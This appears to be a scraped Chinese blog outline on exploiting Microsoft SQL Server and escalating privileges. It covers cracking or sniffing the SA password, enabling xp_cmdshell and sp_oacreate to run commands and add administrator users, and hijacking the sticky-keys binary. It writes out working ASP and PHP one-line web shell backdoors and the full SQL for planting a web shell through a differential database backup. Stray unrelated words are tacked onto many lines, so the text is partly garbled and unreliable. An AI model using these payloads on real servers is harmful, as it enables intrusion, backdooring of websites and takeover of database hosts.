MSSQL 漏洞利用與提權

一、SA口令的獲取php

webshell或源代碼的獲取web

源代碼泄露sql

嗅探(用CAIN等工具嗅探1433數據庫端口)shell

口令暴力破解數據庫

二、常見SQL server 提權命令服務器

查看數據庫的版本(select @@version;)app

查看數據庫所在服務器操做系統的參數函數

查看數據庫啓動的參數工具

查看數據庫啓動的時間網站

查看數據庫服務器名和實例名

查看用戶登陸信息

查看數據庫裏所全部的存儲工程和函數

查看數據庫裏用戶和進程的信息

恢復存儲過程

開啓和關閉xp_cmdshell

xp_cmdshell執行命令

開啓和關閉sp_oacreate

sp_oacreate刪除文件

sp_oacreate複製文件

sp_oacreate移動文件

sp_oacreate添加管理員用戶

開啓和關閉sp_makeweblask\

wscript.shell執行命令

shell.applocation執行命令

開啓和關閉openrowset

沙盒執行命令

註冊表劫持粘貼鍵

sp_oacreate替換粘貼鍵

public提權操做

echo一句話後門(echo  <%eval request(cmd)%> >d:\wwwroot\ok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

在mssql 中查詢password

三、經過數據庫備份獲取webshell

差別備份一句話木馬

backup database [當前數據庫名] to disk = 'c:\recycler\1.bak'

create table cmd (a image);

insert into cmd(a) values ('<%eval request("cmd")%>');

backup database [當前數據庫名] to disk = '網站絕對路徑' WITH DIFFERENTIAL,FORMAT--

 

LOG 備份一句話木馬(......)

相關文章
相關標籤/搜索